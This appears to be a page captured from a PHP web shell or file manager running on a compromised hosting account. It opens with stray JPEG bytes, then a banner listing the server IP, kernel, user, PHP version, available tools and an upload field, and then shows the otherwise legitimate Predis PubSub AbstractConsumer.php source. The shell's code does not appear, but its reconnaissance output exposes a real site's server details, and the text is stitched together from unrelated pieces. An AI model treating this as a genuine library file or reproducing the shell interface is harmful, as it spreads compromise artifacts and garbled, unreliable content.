����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.16.130.16 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/bofirmacademy.com/vendor/predis/predis/src/PubSub/ |
Upload File : |
<?php /* * This file is part of the Predis package. * * (c) 2009-2020 Daniele Alessandri * (c) 2021-2023 Till Krüss * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Predis\PubSub; use Iterator; use ReturnTypeWillChange; /** * Base implementation of a PUB/SUB consumer abstraction based on PHP iterators. */ abstract class AbstractConsumer implements Iterator { public const SUBSCRIBE = 'subscribe'; public const UNSUBSCRIBE = 'unsubscribe'; public const PSUBSCRIBE = 'psubscribe'; public const PUNSUBSCRIBE = 'punsubscribe'; public const MESSAGE = 'message'; public const PMESSAGE = 'pmessage'; public const PONG = 'pong'; public const STATUS_VALID = 1; // 0b0001 public const STATUS_SUBSCRIBED = 2; // 0b0010 public const STATUS_PSUBSCRIBED = 4; // 0b0100 protected $position; protected $statusFlags = self::STATUS_VALID; /** * Automatically stops the consumer when the garbage collector kicks in. */ public function __destruct() { $this->stop(true); } /** * Checks if the specified flag is valid based on the state of the consumer. * * @param int $value Flag. * * @return bool */ protected function isFlagSet($value) { return ($this->statusFlags & $value) === $value; } /** * Subscribes to the specified channels. * * @param string ...$channel One or more channel names. */ public function subscribe($channel /* , ... */) { $this->writeRequest(self::SUBSCRIBE, func_get_args()); $this->statusFlags |= self::STATUS_SUBSCRIBED; } /** * Unsubscribes from the specified channels. * * @param string ...$channel One or more channel names. */ public function unsubscribe(...$channel) { $this->writeRequest(self::UNSUBSCRIBE, func_get_args()); } /** * Subscribes to the specified channels using a pattern. * * @param string ...$pattern One or more channel name patterns. */ public function psubscribe(...$pattern) { $this->writeRequest(self::PSUBSCRIBE, func_get_args()); $this->statusFlags |= self::STATUS_PSUBSCRIBED; } /** * Unsubscribes from the specified channels using a pattern. * * @param string ...$pattern One or more channel name patterns. */ public function punsubscribe(...$pattern) { $this->writeRequest(self::PUNSUBSCRIBE, func_get_args()); } /** * PING the server with an optional payload that will be echoed as a * PONG message in the pub/sub loop. * * @param string $payload Optional PING payload. */ public function ping($payload = null) { $this->writeRequest('PING', [$payload]); } /** * Closes the context by unsubscribing from all the subscribed channels. The * context can be forcefully closed by dropping the underlying connection. * * @param bool $drop Indicates if the context should be closed by dropping the connection. * * @return bool Returns false when there are no pending messages. */ public function stop($drop = false) { if (!$this->valid()) { return false; } if ($drop) { $this->invalidate(); $this->disconnect(); } else { if ($this->isFlagSet(self::STATUS_SUBSCRIBED)) { $this->unsubscribe(); } if ($this->isFlagSet(self::STATUS_PSUBSCRIBED)) { $this->punsubscribe(); } } return !$drop; } /** * Closes the underlying connection when forcing a disconnection. */ abstract protected function disconnect(); /** * Writes a Redis command on the underlying connection. * * @param string $method Command ID. * @param array $arguments Arguments for the command. */ abstract protected function writeRequest($method, $arguments); /** * @return void */ #[ReturnTypeWillChange] public function rewind() { // NOOP } /** * Returns the last message payload retrieved from the server and generated * by one of the active subscriptions. * * @return array */ #[ReturnTypeWillChange] public function current() { return $this->getValue(); } /** * @return int|null */ #[ReturnTypeWillChange] public function key() { return $this->position; } /** * @return int|null */ #[ReturnTypeWillChange] public function next() { if ($this->valid()) { ++$this->position; } return $this->position; } /** * Checks if the the consumer is still in a valid state to continue. * * @return bool */ #[ReturnTypeWillChange] public function valid() { $isValid = $this->isFlagSet(self::STATUS_VALID); $subscriptionFlags = self::STATUS_SUBSCRIBED | self::STATUS_PSUBSCRIBED; $hasSubscriptions = ($this->statusFlags & $subscriptionFlags) > 0; return $isValid && $hasSubscriptions; } /** * Resets the state of the consumer. */ protected function invalidate() { $this->statusFlags = 0; // 0b0000; } /** * Waits for a new message from the server generated by one of the active * subscriptions and returns it when available. * * @return array */ abstract protected function getValue(); }